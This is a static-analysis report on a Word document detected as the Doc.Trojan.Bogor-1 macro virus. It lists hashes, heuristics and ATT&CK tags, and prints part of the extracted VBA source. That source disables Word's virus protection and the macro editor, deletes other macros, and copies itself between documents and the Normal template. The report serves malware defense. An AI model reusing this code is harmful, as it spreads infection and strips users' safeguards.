Doc.Trojan.Bogor-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 b52bf8ec3faa71a8…

MALICIOUS

Office (OLE)

47.5 KB Created: 1999-08-02 16:22:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 18061c2f323d98a63f3601cb4b940826 SHA-1: d4faf03a3e3026ce26a6b154d55a627e5d09fd83 SHA-256: b52bf8ec3faa71a896cb82769c090e008deaef2a26eaab78f9b72e15507e1e5c
220 Risk Score

Malware Insights

Doc.Trojan.Bogor-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro virus markers and VBA macros, including an AutoOpen macro, which are indicative of malicious intent. ClamAV signatures identify it as Doc.Trojan.Bogor-1. The VBA macro 'macros.bas' is likely responsible for executing the malicious payload, potentially downloading and running a second-stage exploit.

Heuristics 4

  • ClamAV: Doc.Trojan.Bogor-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bogor-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7723 bytes
SHA-256: aa1f418dc89597121814cddb632659c10e654cff01a64b2853fe599336b0e297
Detection
ClamAV: Doc.Trojan.Bogor-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "IPBBogor"
Public AlAsal
Public DokSave
Public Norok
Public Dokok
Sub CyInit()
Attribute CyInit.VB_Description = "Bogor Agriculture University"
Attribute CyInit.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyInit"
    AlAsal = Application.DisplayAlerts
    Application.DisplayAlerts = wdAlertsNone
    Call Tahan
    WordBasic.DisableAutoMacros
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    On Error Resume Next
    CommandBars("Tools").Controls("Macro").Delete
    CustomizationContext = NormalTemplate
    FindKey(BuildKeyCode(wdKeyF11, wdKeyAlt)).Disable
    FindKey(BuildKeyCode(wdKeyF8, wdKeyAlt)).Disable
    On Error GoTo 0
End Sub
Sub CyClose()
Attribute CyClose.VB_Description = "Bogor Agriculture University"
Attribute CyClose.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.CyClose"
Application.DisplayAlerts = AlAsal
End Sub
Sub Dok2Nor()
Attribute Dok2Nor.VB_Description = "Bogor Agriculture University"
Attribute Dok2Nor.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Dok2Nor"
    Call Tahan
    On Error GoTo Erw1
    Norok = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh1a
    For i = 1 To NT.VBProject.VBComponents.Count
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Norok = True
      If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") Then
        Application.OrganizerDelete Source:=NT.FullName, _
            Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Erh1a:
    If Norok = False Then
      On Error GoTo Erh1
      Application.OrganizerCopy Source:=AD.FullName, _
          Destination:=NT.FullName, Name:= _
          "IPBBogor", Object:=wdOrganizerObjectProjectItems
      Templates(NT.FullName).Save
Erh1:
    End If
Erw1:
End Sub
Sub Nor2Dok()
Attribute Nor2Dok.VB_Description = "Bogor Agriculture University"
Attribute Nor2Dok.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Nor2Dok"
    On Error GoTo Erw2
    DokSave = 0
    Dokok = False
    Set AD = ActiveDocument
    Set NT = NormalTemplate
    On Error GoTo Erh2a
    For i = 1 To AD.VBProject.VBComponents.Count
      NMacr = AD.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Dokok = True
      NMacr = NT.VBProject.VBComponents(i).Name
      If NMacr = "IPBBogor" Then Dokok = True
      If (NMacr <> "IPBBogor") And (NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
        Application.OrganizerDelete Source:=AD.FullName, _
          Name:=NMacr, Object:=wdOrganizerObjectProjectItems
      End If
    Next i
Erh2a:
    If Dokok = False Then
      On Error GoTo Erh2
      Application.OrganizerCopy Source:=NT.FullName, _
          Destination:=AD.FullName, Name:= _
          "IPBBogor", Object:=wdOrganizerObjectProjectItems
      DokSave = 1
Erh2:
    End If
Erw2:
End Sub
Sub Cyber()
Attribute Cyber.VB_Description = "Bogor Agriculture University"
Attribute Cyber.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Cyber"
    Call CyInit
    Call Dok2Nor
    Call CyClose
End Sub
Sub Tahan()
Attribute Tahan.VB_Description = "Bogor Agriculture University"
Attribute Tahan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Tahan"
    With Options
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
End Sub
Sub Simpan()
Attribute Simpan.VB_Description = "Bogor Agriculture University"
Attribute Simpan.VB_ProcData.VB_Invoke_Func = "Normal.IPBBogor.Simpan"
    On Error GoTo Erh4
Set AD = ActiveDocument
    If DokSave = 1 Then
       AD.SaveAs FileName:=AD.Name, FileFormat:=wdFormatDocu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.